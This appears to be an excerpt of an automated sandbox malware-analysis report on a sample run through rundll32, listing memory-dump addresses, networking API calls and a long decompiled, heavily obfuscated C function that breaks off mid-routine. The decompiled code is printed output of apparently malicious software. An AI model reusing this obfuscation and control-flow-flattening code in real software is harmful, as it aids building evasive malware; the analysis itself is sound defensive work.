                                                                                                                      0x002cf7ab
                                                                                                                      0x002cf7af
                                                                                                                      0x00000000
                                                                                                                      0x002cf7af
                                                                                                                      0x00000000
                                                                                                                      0x002cf6e1
                                                                                                                      0x002cf6e7
                                                                                                                      0x002cf71e
                                                                                                                      0x00000000
                                                                                                                      0x002cf6e9
                                                                                                                      0x002cf6ef
                                                                                                                      0x00000000
                                                                                                                      0x002cf6f5
                                                                                                                      0x002cf70c
                                                                                                                      0x002cf711
                                                                                                                      0x002cf714
                                                                                                                      0x00000000
                                                                                                                      0x002cf714
                                                                                                                      0x002cf6ef
                                                                                                                      0x002cf6e7
                                                                                                                      0x002cf6df
                                                                                                                      0x00000000
                                                                                                                      0x002cf7e1
                                                                                                                      0x002cf7e1
                                                                                                                      0x002cf7e5
                                                                                                                      0x002cf7fb
                                                                                                                      0x002cf7fb
                                                                                                                      0x00000000
                                                                                                                      0x002cf7fb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #A/Z$3m0$5$7_Z$?kd$Dr$E*X$E*X$Yb$eo$|MC
                                                                                                                      • API String ID: 0-1059594742
                                                                                                                      • Opcode ID: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction ID: 49f4c5cf227c86fd636e1f845a708cf57563128edf7d9fdf156924980f11f049
                                                                                                                      • Opcode Fuzzy Hash: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction Fuzzy Hash: 472232719183808FE3A4CF25C58AA4BFBE1FBC4354F508A2DE6D996260D7B18919CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 10012C6C
                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                      • _strcat.LIBCMT ref: 10012CE9
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                      • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                        • Part of subcall function 1001DD46: GetDlgItem.USER32(?,6D2214A9), ref: 1001DD53
                                                                                                                        • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                      • String ID: Connected$Disconnected$Wait...
                                                                                                                      • API String ID: 2263617321-2304371739
                                                                                                                      • Opcode ID: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction ID: 6a29e3ac87f5f9b0e95b07577220059068a2bdb443e3840c63f2d59567e72b14
                                                                                                                      • Opcode Fuzzy Hash: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction Fuzzy Hash: 26513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002B472E(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				char _v2084;
                                                                                                                      				char _v2604;
                                                                                                                      				intOrPtr _v2608;
                                                                                                                      				intOrPtr _v2612;
                                                                                                                      				char _v2616;
                                                                                                                      				intOrPtr _v2620;
                                                                                                                      				char _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _v2780;
                                                                                                                      				signed int _v2784;
                                                                                                                      				signed int _v2788;
                                                                                                                      				signed int _v2792;
                                                                                                                      				signed int _v2796;
                                                                                                                      				signed int _v2800;
                                                                                                                      				signed int _v2804;
                                                                                                                      				signed int _v2808;
                                                                                                                      				signed int _v2812;
                                                                                                                      				signed int _v2816;
                                                                                                                      				signed int _v2820;
                                                                                                                      				signed int _v2824;
                                                                                                                      				signed int _v2828;
                                                                                                                      				signed int _v2832;
                                                                                                                      				signed int _v2836;
                                                                                                                      				signed int _v2840;
                                                                                                                      				signed int _v2844;
                                                                                                                      				signed int _v2848;
                                                                                                                      				signed int _v2852;
                                                                                                                      				signed int _v2856;
                                                                                                                      				signed int _v2860;
                                                                                                                      				signed int _v2864;
                                                                                                                      				signed int _v2868;
                                                                                                                      				signed int _v2872;
                                                                                                                      				signed int _v2876;
                                                                                                                      				signed int _v2880;
                                                                                                                      				signed int _v2884;
                                                                                                                      				signed int _v2888;
                                                                                                                      				signed int _v2892;
                                                                                                                      				signed int _v2896;
                                                                                                                      				signed int _v2900;
                                                                                                                      				signed int _v2904;
                                                                                                                      				signed int _v2908;
                                                                                                                      				signed int _v2912;
                                                                                                                      				signed int _v2916;
                                                                                                                      				signed int _v2920;
                                                                                                                      				signed int _v2924;
                                                                                                                      				signed int _v2928;
                                                                                                                      				signed int _v2932;
                                                                                                                      				signed int _v2936;
                                                                                                                      				signed int _v2940;
                                                                                                                      				signed int _t797;
                                                                                                                      				void* _t798;
                                                                                                                      				void* _t812;
                                                                                                                      				signed int _t830;
                                                                                                                      				signed int _t832;
                                                                                                                      				signed int _t833;
                                                                                                                      				signed int _t834;
                                                                                                                      				signed int _t835;
                                                                                                                      				signed int _t836;
                                                                                                                      				signed int _t837;
                                                                                                                      				signed int _t838;
                                                                                                                      				signed int _t839;
                                                                                                                      				signed int _t840;
                                                                                                                      				signed int _t841;
                                                                                                                      				signed int _t842;
                                                                                                                      				signed int _t843;
                                                                                                                      				signed int _t844;
                                                                                                                      				signed int _t845;
                                                                                                                      				signed int _t846;
                                                                                                                      				signed int _t847;
                                                                                                                      				signed int _t848;
                                                                                                                      				signed int _t849;
                                                                                                                      				signed int _t850;
                                                                                                                      				signed int _t851;
                                                                                                                      				signed int _t852;
                                                                                                                      				signed int _t858;
                                                                                                                      				signed int _t930;
                                                                                                                      				signed int _t931;
                                                                                                                      				void* _t936;
                                                                                                                      				signed int* _t937;
                                                                                                                      				void* _t945;
                                                                                                                      
                                                                                                                      				_t937 =  &_v2940;
                                                                                                                      				_v2888 = 0x58ed27;
                                                                                                                      				_v2888 = _v2888 | 0x83563905;
                                                                                                                      				_v2888 = _v2888 * 0x46;
                                                                                                                      				_t936 = __ecx;
                                                                                                                      				_t931 = 0x63d9dbc;
                                                                                                                      				_t832 = 0x70;
                                                                                                                      				_v2888 = _v2888 * 0x21;
                                                                                                                      				_v2888 = _v2888 ^ 0x6b204dc3;
                                                                                                                      				_v2700 = 0xe9de42;
                                                                                                                      				_v2700 = _v2700 >> 0xa;
                                                                                                                      				_v2700 = _v2700 ^ 0x00103a77;
                                                                                                                      				_v2936 = 0x549012;
                                                                                                                      				_v2936 = _v2936 + 0x60a5;
                                                                                                                      				_v2936 = _v2936 >> 7;
                                                                                                                      				_v2936 = _v2936 | 0x1d415c41;
                                                                                                                      				_v2936 = _v2936 ^ 0x1d4ed04e;
                                                                                                                      				_v2808 = 0xe235c3;
                                                                                                                      				_v2808 = _v2808 >> 0x10;
                                                                                                                      				_v2808 = _v2808 ^ 0xf71055a5;
                                                                                                                      				_v2808 = _v2808 ^ 0xf7181377;
                                                                                                                      				_v2788 = 0x4c3834;
                                                                                                                      				_v2788 = _v2788 >> 0xa;
                                                                                                                      				_v2788 = _v2788 + 0x8e2;
                                                                                                                      				_v2788 = _v2788 ^ 0x000a3430;
                                                                                                                      				_v2844 = 0x57ca8b;
                                                                                                                      				_v2844 = _v2844 ^ 0xd732e8d9;
                                                                                                                      				_v2844 = _v2844 << 4;
                                                                                                                      				_v2844 = _v2844 ^ 0x7657b035;
                                                                                                                      				_v2920 = 0x3116bc;
                                                                                                                      				_v2920 = _v2920 / _t832;
                                                                                                                      				_v2920 = _v2920 << 7;
                                                                                                                      				_v2920 = _v2920 | 0xbaa7d477;
                                                                                                                      				_v2920 = _v2920 ^ 0xbab318b9;
                                                                                                                      				_v2864 = 0x147254;
                                                                                                                      				_v2864 = _v2864 >> 0x10;
                                                                                                                      				_v2864 = _v2864 ^ 0xe9282c9a;
                                                                                                                      				_t833 = 0x42;
                                                                                                                      				_v2864 = _v2864 * 0x67;
                                                                                                                      				_v2864 = _v2864 ^ 0xcf208e56;
                                                                                                                      				_v2628 = 0x43de16;
                                                                                                                      				_v2628 = _v2628 / _t833;
                                                                                                                      				_v2628 = _v2628 ^ 0x00078ced;
                                                                                                                      				_v2880 = 0xe32302;
                                                                                                                      				_v2880 = _v2880 << 0xa;
                                                                                                                      				_t834 = 0x66;
                                                                                                                      				_v2880 = _v2880 / _t834;
                                                                                                                      				_v2880 = _v2880 | 0x6d622614;
                                                                                                                      				_v2880 = _v2880 ^ 0x6d625826;
                                                                                                                      				_v2904 = 0x214f4b;
                                                                                                                      				_t835 = 0x64;
                                                                                                                      				_v2904 = _v2904 / _t835;
                                                                                                                      				_v2904 = _v2904 << 7;
                                                                                                                      				_v2904 = _v2904 ^ 0x5c13da49;
                                                                                                                      				_v2904 = _v2904 ^ 0x5c3fedf9;
                                                                                                                      				_v2632 = 0x15dffa;
                                                                                                                      				_v2632 = _v2632 | 0xc7418eca;
                                                                                                                      				_v2632 = _v2632 ^ 0xc75c6c30;
                                                                                                                      				_v2692 = 0x7a9c1f;
                                                                                                                      				_v2692 = _v2692 >> 9;
                                                                                                                      				_v2692 = _v2692 ^ 0x00075ef2;
                                                                                                                      				_v2840 = 0xf91be9;
                                                                                                                      				_v2840 = _v2840 << 0xb;
                                                                                                                      				_v2840 = _v2840 >> 0xc;
                                                                                                                      				_v2840 = _v2840 ^ 0x00055b58;
                                                                                                                      				_v2684 = 0x12d980;
                                                                                                                      				_v2684 = _v2684 ^ 0x93e0c374;
                                                                                                                      				_v2684 = _v2684 ^ 0x93f47314;
                                                                                                                      				_v2832 = 0x3fcd4e;
                                                                                                                      				_t836 = 0x39;
                                                                                                                      				_v2832 = _v2832 * 0x23;
                                                                                                                      				_v2832 = _v2832 ^ 0x731c45b4;
                                                                                                                      				_v2832 = _v2832 ^ 0x7ba35a76;
                                                                                                                      				_v2932 = 0xb82be4;
                                                                                                                      				_v2932 = _v2932 >> 2;
                                                                                                                      				_v2932 = _v2932 + 0xffffbbf6;
                                                                                                                      				_v2932 = _v2932 ^ 0xe6b723f0;
                                                                                                                      				_v2932 = _v2932 ^ 0xe690d0e6;
                                                                                                                      				_v2940 = 0xf6526b;
                                                                                                                      				_v2940 = _v2940 | 0x896b4159;
                                                                                                                      				_v2940 = _v2940 >> 3;
                                                                                                                      				_v2940 = _v2940 | 0x09d41357;
                                                                                                                      				_v2940 = _v2940 ^ 0x19f157b8;
                                                                                                                      				_v2676 = 0xe71313;
                                                                                                                      				_v2676 = _v2676 << 0xd;
                                                                                                                      				_v2676 = _v2676 ^ 0xe2630a9f;
                                                                                                                      				_v2640 = 0xe3d77b;
                                                                                                                      				_v2640 = _v2640 * 0x19;
                                                                                                                      				_v2640 = _v2640 ^ 0x1648a918;
                                                                                                                      				_v2816 = 0xdf828c;
                                                                                                                      				_v2816 = _v2816 | 0xf06a9773;
                                                                                                                      				_v2816 = _v2816 + 0x1ac7;
                                                                                                                      				_v2816 = _v2816 ^ 0xf0f0cf03;
                                                                                                                      				_v2644 = 0x24d1c;
                                                                                                                      				_v2644 = _v2644 >> 0xd;
                                                                                                                      				_v2644 = _v2644 ^ 0x000db5f9;
                                                                                                                      				_v2668 = 0x9507be;
                                                                                                                      				_v2668 = _v2668 + 0xd758;
                                                                                                                      				_v2668 = _v2668 ^ 0x009d301b;
                                                                                                                      				_v2824 = 0xe674f2;
                                                                                                                      				_v2824 = _v2824 + 0xffffc4e0;
                                                                                                                      				_v2824 = _v2824 ^ 0xd4611b5a;
                                                                                                                      				_v2824 = _v2824 ^ 0xd482eada;
                                                                                                                      				_v2648 = 0x3f77b6;
                                                                                                                      				_v2648 = _v2648 * 0x1f;
                                                                                                                      				_v2648 = _v2648 ^ 0x07a98b69;
                                                                                                                      				_v2916 = 0xdc78a8;
                                                                                                                      				_v2916 = _v2916 << 5;
                                                                                                                      				_v2916 = _v2916 / _t836;
                                                                                                                      				_t837 = 0x7a;
                                                                                                                      				_v2916 = _v2916 * 0x39;
                                                                                                                      				_v2916 = _v2916 ^ 0x1b8ad1f1;
                                                                                                                      				_v2728 = 0xa8155b;
                                                                                                                      				_v2728 = _v2728 >> 0xd;
                                                                                                                      				_v2728 = _v2728 ^ 0x000db557;
                                                                                                                      				_v2924 = 0xc6e5a0;
                                                                                                                      				_v2924 = _v2924 * 0x2c;
                                                                                                                      				_v2924 = _v2924 << 5;
                                                                                                                      				_v2924 = _v2924 | 0x115a405f;
                                                                                                                      				_v2924 = _v2924 ^ 0x55fa9076;
                                                                                                                      				_v2856 = 0x96149c;
                                                                                                                      				_v2856 = _v2856 / _t837;
                                                                                                                      				_v2856 = _v2856 + 0xf5fc;
                                                                                                                      				_v2856 = _v2856 ^ 0x000b25f1;
                                                                                                                      				_v2908 = 0xf2f954;
                                                                                                                      				_v2908 = _v2908 << 6;
                                                                                                                      				_v2908 = _v2908 + 0xac42;
                                                                                                                      				_v2908 = _v2908 ^ 0xa8828693;
                                                                                                                      				_v2908 = _v2908 ^ 0x943e6ee2;
                                                                                                                      				_v2732 = 0x9d6f74;
                                                                                                                      				_t838 = 0x46;
                                                                                                                      				_v2732 = _v2732 / _t838;
                                                                                                                      				_v2732 = _v2732 ^ 0x000ebec1;
                                                                                                                      				_v2820 = 0x59e1c1;
                                                                                                                      				_v2820 = _v2820 * 0x4d;
                                                                                                                      				_v2820 = _v2820 / _t838;
                                                                                                                      				_v2820 = _v2820 ^ 0x00608b59;
                                                                                                                      				_v2716 = 0x351287;
                                                                                                                      				_v2716 = _v2716 >> 1;
                                                                                                                      				_v2716 = _v2716 ^ 0x0018d4d2;
                                                                                                                      				_v2812 = 0xcb2c1b;
                                                                                                                      				_t839 = 0x2b;
                                                                                                                      				_v2812 = _v2812 / _t839;
                                                                                                                      				_v2812 = _v2812 + 0xffff7101;
                                                                                                                      				_v2812 = _v2812 ^ 0x0007f207;
                                                                                                                      				_v2660 = 0xceb36b;
                                                                                                                      				_t840 = 0x67;
                                                                                                                      				_v2660 = _v2660 / _t840;
                                                                                                                      				_v2660 = _v2660 ^ 0x000d619e;
                                                                                                                      				_v2744 = 0xbb097e;
                                                                                                                      				_v2744 = _v2744 | 0xecb8e5a6;
                                                                                                                      				_v2744 = _v2744 << 7;
                                                                                                                      				_v2744 = _v2744 ^ 0x5df8a0e4;
                                                                                                                      				_v2912 = 0xf8d451;
                                                                                                                      				_v2912 = _v2912 >> 4;
                                                                                                                      				_v2912 = _v2912 | 0xaea8ed4c;
                                                                                                                      				_v2912 = _v2912 + 0xffff0521;
                                                                                                                      				_v2912 = _v2912 ^ 0xaea7c2f3;
                                                                                                                      				_v2752 = 0x565eb7;
                                                                                                                      				_v2752 = _v2752 * 0x70;
                                                                                                                      				_v2752 = _v2752 * 0x24;
                                                                                                                      				_v2752 = _v2752 ^ 0x505f8268;
                                                                                                                      				_v2652 = 0xc20920;
                                                                                                                      				_v2652 = _v2652 * 0x66;
                                                                                                                      				_v2652 = _v2652 ^ 0x4d45043e;
                                                                                                                      				_v2804 = 0x19938d;
                                                                                                                      				_v2804 = _v2804 << 0xb;
                                                                                                                      				_v2804 = _v2804 >> 6;
                                                                                                                      				_v2804 = _v2804 ^ 0x0331c866;
                                                                                                                      				_v2708 = 0x9f0ca5;
                                                                                                                      				_v2708 = _v2708 + 0x5236;
                                                                                                                      				_v2708 = _v2708 ^ 0x009f1cbf;
                                                                                                                      				_v2636 = 0x17d7da;
                                                                                                                      				_v2636 = _v2636 + 0xffff61a3;
                                                                                                                      				_v2636 = _v2636 ^ 0x001c6ee3;
                                                                                                                      				_v2772 = 0x640c2e;
                                                                                                                      				_v2772 = _v2772 | 0xfe977bed;
                                                                                                                      				_v2772 = _v2772 ^ 0xfef1aca3;
                                                                                                                      				_v2712 = 0x57713;
                                                                                                                      				_v2712 = _v2712 | 0x1719e5a8;
                                                                                                                      				_v2712 = _v2712 ^ 0x171223b6;
                                                                                                                      				_v2800 = 0xacde46;
                                                                                                                      				_v2800 = _v2800 << 3;
                                                                                                                      				_v2800 = _v2800 >> 0xb;
                                                                                                                      				_v2800 = _v2800 ^ 0x00094896;
                                                                                                                      				_v2900 = 0xf23167;
                                                                                                                      				_v2900 = _v2900 << 8;
                                                                                                                      				_t841 = 0x63;
                                                                                                                      				_v2900 = _v2900 / _t841;
                                                                                                                      				_v2900 = _v2900 + 0xcf21;
                                                                                                                      				_v2900 = _v2900 ^ 0x02793070;
                                                                                                                      				_v2720 = 0x2ffea5;
                                                                                                                      				_v2720 = _v2720 >> 0xa;
                                                                                                                      				_v2720 = _v2720 ^ 0x000a3377;
                                                                                                                      				_v2760 = 0x7162f3;
                                                                                                                      				_v2760 = _v2760 + 0x3cd5;
                                                                                                                      				_t842 = 0x38;
                                                                                                                      				_v2760 = _v2760 / _t842;
                                                                                                                      				_v2760 = _v2760 ^ 0x0007aff4;
                                                                                                                      				_v2928 = 0x75cba7;
                                                                                                                      				_v2928 = _v2928 >> 6;
                                                                                                                      				_t843 = 0x74;
                                                                                                                      				_v2928 = _v2928 / _t843;
                                                                                                                      				_t844 = 0x21;
                                                                                                                      				_v2928 = _v2928 * 0x5b;
                                                                                                                      				_v2928 = _v2928 ^ 0x00010bb2;
                                                                                                                      				_v2896 = 0xbdd326;
                                                                                                                      				_v2896 = _v2896 | 0x8e80784e;
                                                                                                                      				_v2896 = _v2896 + 0xffff4642;
                                                                                                                      				_v2896 = _v2896 + 0xfffff2a7;
                                                                                                                      				_v2896 = _v2896 ^ 0x8eb0d4b0;
                                                                                                                      				_v2724 = 0x540c5f;
                                                                                                                      				_v2724 = _v2724 | 0x0f00b7a6;
                                                                                                                      				_v2724 = _v2724 ^ 0x0f539187;
                                                                                                                      				_v2672 = 0x9e9c9c;
                                                                                                                      				_v2672 = _v2672 | 0xc48b5739;
                                                                                                                      				_v2672 = _v2672 ^ 0xc4908703;
                                                                                                                      				_v2776 = 0xa23bdf;
                                                                                                                      				_v2776 = _v2776 * 0x51;
                                                                                                                      				_v2776 = _v2776 + 0xe0c7;
                                                                                                                      				_v2776 = _v2776 ^ 0x335416a6;
                                                                                                                      				_v2680 = 0x681f8;
                                                                                                                      				_v2680 = _v2680 + 0xffff4f6a;
                                                                                                                      				_v2680 = _v2680 ^ 0x00015d99;
                                                                                                                      				_v2784 = 0xd006bd;
                                                                                                                      				_v2784 = _v2784 / _t844;
                                                                                                                      				_v2784 = _v2784 + 0xffffb229;
                                                                                                                      				_v2784 = _v2784 ^ 0x00021ec3;
                                                                                                                      				_v2884 = 0x9df7f6;
                                                                                                                      				_v2884 = _v2884 << 3;
                                                                                                                      				_v2884 = _v2884 >> 0xa;
                                                                                                                      				_v2884 = _v2884 ^ 0x9c3d07c3;
                                                                                                                      				_v2884 = _v2884 ^ 0x9c378ea0;
                                                                                                                      				_v2664 = 0x8a5c5e;
                                                                                                                      				_v2664 = _v2664 + 0xb05;
                                                                                                                      				_v2664 = _v2664 ^ 0x008bdf18;
                                                                                                                      				_v2892 = 0xf8cc9d;
                                                                                                                      				_v2892 = _v2892 * 0x75;
                                                                                                                      				_v2892 = _v2892 * 0x2f;
                                                                                                                      				_v2892 = _v2892 + 0x5b88;
                                                                                                                      				_v2892 = _v2892 ^ 0xe0504abc;
                                                                                                                      				_v2768 = 0xf7b3ac;
                                                                                                                      				_v2768 = _v2768 * 0x12;
                                                                                                                      				_v2768 = _v2768 * 0x37;
                                                                                                                      				_v2768 = _v2768 ^ 0xbde7c305;
                                                                                                                      				_v2736 = 0x24d80;
                                                                                                                      				_v2736 = _v2736 + 0xc084;
                                                                                                                      				_v2736 = _v2736 ^ 0x0003dff9;
                                                                                                                      				_v2756 = 0xcbd51;
                                                                                                                      				_v2756 = _v2756 ^ 0x3e0e537e;
                                                                                                                      				_t845 = 0x33;
                                                                                                                      				_v2756 = _v2756 / _t845;
                                                                                                                      				_v2756 = _v2756 ^ 0x01338860;
                                                                                                                      				_v2876 = 0x572b9a;
                                                                                                                      				_v2876 = _v2876 | 0xf33633ff;
                                                                                                                      				_v2876 = _v2876 + 0xffffc963;
                                                                                                                      				_t846 = 9;
                                                                                                                      				_v2876 = _v2876 * 0x5a;
                                                                                                                      				_v2876 = _v2876 ^ 0x97d6d328;
                                                                                                                      				_v2780 = 0x1c7f97;
                                                                                                                      				_v2780 = _v2780 | 0xd857d991;
                                                                                                                      				_v2780 = _v2780 ^ 0x2bc247dc;
                                                                                                                      				_v2780 = _v2780 ^ 0xf39978d6;
                                                                                                                      				_v2828 = 0x976a05;
                                                                                                                      				_v2828 = _v2828 << 2;
                                                                                                                      				_v2828 = _v2828 + 0x20c3;
                                                                                                                      				_v2828 = _v2828 ^ 0x0259597b;
                                                                                                                      				_v2764 = 0x91cc1a;
                                                                                                                      				_v2764 = _v2764 ^ 0x7e34b684;
                                                                                                                      				_v2764 = _v2764 / _t846;
                                                                                                                      				_v2764 = _v2764 ^ 0x0e161a93;
                                                                                                                      				_v2836 = 0xb2bb8f;
                                                                                                                      				_v2836 = _v2836 ^ 0xe08a2441;
                                                                                                                      				_v2836 = _v2836 << 9;
                                                                                                                      				_v2836 = _v2836 ^ 0x713d110f;
                                                                                                                      				_v2656 = 0xe40eab;
                                                                                                                      				_t847 = 0x44;
                                                                                                                      				_v2656 = _v2656 / _t847;
                                                                                                                      				_v2656 = _v2656 ^ 0x00028457;
                                                                                                                      				_v2848 = 0xe3c04;
                                                                                                                      				_t848 = 0x16;
                                                                                                                      				_v2848 = _v2848 * 0x5d;
                                                                                                                      				_v2848 = _v2848 + 0xc20e;
                                                                                                                      				_v2848 = _v2848 ^ 0x0525732a;
                                                                                                                      				_v2872 = 0x975bd1;
                                                                                                                      				_v2872 = _v2872 / _t848;
                                                                                                                      				_v2872 = _v2872 >> 1;
                                                                                                                      				_t849 = 0x62;
                                                                                                                      				_v2872 = _v2872 / _t849;
                                                                                                                      				_v2872 = _v2872 ^ 0x00094208;
                                                                                                                      				_v2852 = 0xde6f00;
                                                                                                                      				_v2852 = _v2852 + 0xdf6f;
                                                                                                                      				_t850 = 0x4c;
                                                                                                                      				_v2852 = _v2852 / _t850;
                                                                                                                      				_v2852 = _v2852 ^ 0x0009f2db;
                                                                                                                      				_v2796 = 0x43f736;
                                                                                                                      				_t851 = 0x53;
                                                                                                                      				_v2796 = _v2796 / _t851;
                                                                                                                      				_v2796 = _v2796 + 0x7bc9;
                                                                                                                      				_v2796 = _v2796 ^ 0x00042e34;
                                                                                                                      				_v2688 = 0xf8ab78;
                                                                                                                      				_t852 = 0x3c;
                                                                                                                      				_v2688 = _v2688 * 0x22;
                                                                                                                      				_v2688 = _v2688 ^ 0x21025542;
                                                                                                                      				_v2696 = 0x9e8755;
                                                                                                                      				_v2696 = _v2696 + 0xe3ef;
                                                                                                                      				_v2696 = _v2696 ^ 0x00960058;
                                                                                                                      				_v2792 = 0x415dac;
                                                                                                                      				_v2792 = _v2792 >> 1;
                                                                                                                      				_v2792 = _v2792 + 0xffffd338;
                                                                                                                      				_v2792 = _v2792 ^ 0x002ca457;
                                                                                                                      				_v2704 = 0xb8f6ce;
                                                                                                                      				_v2704 = _v2704 + 0xffff4ac5;
                                                                                                                      				_v2704 = _v2704 ^ 0x00b9d8ec;
                                                                                                                      				_v2860 = 0x12dd79;
                                                                                                                      				_v2860 = _v2860 ^ 0x144e403a;
                                                                                                                      				_v2860 = _v2860 / _t852;
                                                                                                                      				_v2860 = _v2860 ^ 0x93d5fcb7;
                                                                                                                      				_v2860 = _v2860 ^ 0x93828b4c;
                                                                                                                      				_v2868 = 0x481259;
                                                                                                                      				_v2868 = _v2868 ^ 0xea83c1db;
                                                                                                                      				_v2868 = _v2868 + 0xffff22f6;
                                                                                                                      				_v2868 = _v2868 | 0xf9bd7925;
                                                                                                                      				_v2868 = _v2868 ^ 0xfbfe4ce9;
                                                                                                                      				_v2740 = 0xefe715;
                                                                                                                      				_v2740 = _v2740 << 7;
                                                                                                                      				_v2740 = _v2740 >> 5;
                                                                                                                      				_v2740 = _v2740 ^ 0x03bc65a1;
                                                                                                                      				_v2748 = 0x39cd9f;
                                                                                                                      				_v2748 = _v2748 * 0x16;
                                                                                                                      				_v2748 = _v2748 + 0xefc3;
                                                                                                                      				_v2748 = _v2748 ^ 0x04f9debc;
                                                                                                                      				_t797 = E002C8FD2(_t852);
                                                                                                                      				_t930 = _v2736;
                                                                                                                      				_t830 = _t797;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t798 = 0x7e670bc;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t945 = _t931 - 0x7d4716d;
                                                                                                                      							if(_t945 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t945 == 0) {
                                                                                                                      								_t858 = _v2848;
                                                                                                                      								E002B68DE(_t858, _v2872, _v2852, _v2796, _t930);
                                                                                                                      								_t937 =  &(_t937[3]);
                                                                                                                      								_t931 = 0x97d4d6b;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t798 = 0x7e670bc;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t931 == 0x9f9f0c) {
                                                                                                                      									_v2612 = E002D13A6();
                                                                                                                      									_v2608 = 2 + E002CBA68(_v2716, _v2812, _v2660, _t808, _v2744) * 2;
                                                                                                                      									_t858 = _t830;
                                                                                                                      									_t812 = E002B5EB5(_t858, _v2912, _t830, _v2752,  &_v2616, _v2700, _v2652, _v2804, _v2708, _t830, _v2716, _v2716, _v2636, _v2772);
                                                                                                                      									_t937 =  &(_t937[0xf]);
                                                                                                                      									__eflags = _t812;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t931 = 0xaab8dea;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t798 = 0x7e670bc;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t931 == 0x1e136d2) {
                                                                                                                      										_push(_v2656);
                                                                                                                      										_push(_v2836);
                                                                                                                      										_push(_v2764);
                                                                                                                      										_push(0);
                                                                                                                      										_push(0);
                                                                                                                      										_push(_v2828);
                                                                                                                      										_push(_t858);
                                                                                                                      										_push(1);
                                                                                                                      										_t858 =  &_v1044;
                                                                                                                      										E002B9700(_t858, _v2780, __eflags);
                                                                                                                      										_t937 =  &(_t937[8]);
                                                                                                                      										_t931 = 0x7d4716d;
